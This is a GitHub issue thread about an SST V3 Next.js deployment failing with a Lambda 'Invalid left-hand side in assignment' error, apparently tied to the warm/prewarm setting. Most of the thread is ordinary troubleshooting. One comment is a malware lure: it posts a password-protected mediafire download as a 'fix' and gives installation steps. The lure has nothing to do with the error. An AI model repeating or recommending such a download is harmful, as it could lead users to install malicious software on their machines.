### ISSUE TITLE
Is there a specific version of node I should use?  GH Actions build fails but website on AWS renders...

### ISSUE THREAD

**Issue by weisisheng** [sst/ion#941]
And logs continue to show a periodic error.

Converting a good working V2 site to V3.  I get the error near the end of the deploy, 

14:44:18.097
Uncaught Exception	{
  "errorType": "Runtime.UserCodeSyntaxError",
  "errorMessage": "SyntaxError: Invalid left-hand side in assignment",
  "stack": [
    "Runtime.UserCodeSyntaxError: SyntaxError: Invalid left-hand side in assignment",
    "    at _loadUserApp (file:///var/runtime/index.mjs:1084:17)",
    "    at async UserFunction.js.module.exports.load (file:///var/runtime/index.mjs:1119:21)",
    "    at async start (file:///var/runtime/index.mjs:1282:23)",
    "    at async file:///var/runtime/index.mjs:1288:1"
  ]
}

Debugging this deep is a bit above my skill-set.  Appreciate any tips, and tricks.  Thanks in advance. 

Next.js 14.5, React 18.3.1, React-Dom 18.3.1, Node 21.x

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by weisisheng** [comment]
I removed the warm lambda setting  (below) as I seem to not be able to figure it out for now and error went away.  Need to revisit.  

<snippet>
  async run() {
    new sst.aws.Nextjs("secint-com-marketing-site", {
      // warm: 1,
      environment: {
        // postmark
        POSTMARK_USER: process.env.POSTMARK_USER || "",
        POSTMARK_PASS: process.env.POSTMARK_PASS || "",
        // stripe
        NEXT_PUBLIC_STRIPE_PUBLISHABLE_KEY:
          process.env.NEXT_PUBLIC_STRIPE_PUBLISHABLE_KEY || "",
        STRIPE_SECRET_KEY: process.env.STRIPE_SECRET_KEY || "",
      },
      domain: {
        name: "foo.com",
        dns: sst.aws.dns({
          zone: "Z0116207!@#$%^&*()",
        }),
        cert: "arn:aws:acm:us-east-1:1234566546546:certificate/9ea464ff-4d76-410a-be3b-78000GBSBDG",
      },
    });
  },

<snippet>

**Comment by DonsWayo** [comment]
I have the same error, looks like the warm lambda have some errors.

```bash
 Error  sst-test sst:aws:Nextjs → sst-testPrewarm aws:lambda:Invocation |  SyntaxError: Invalid left-hand side in assignment","    at _loadUserApp (file:///var/runtime/index.mjs:1084:17)"," at async UserFunction.js.module.exports.load (file:///var/runtime/index.mjs:1119:21)","    at async start(file:///var/runtime/index.mjs:1282:23)","    at async file:///var/runtime/index.mjs:1288:1"]}
```

maybe this need to be opened in open-next repo?
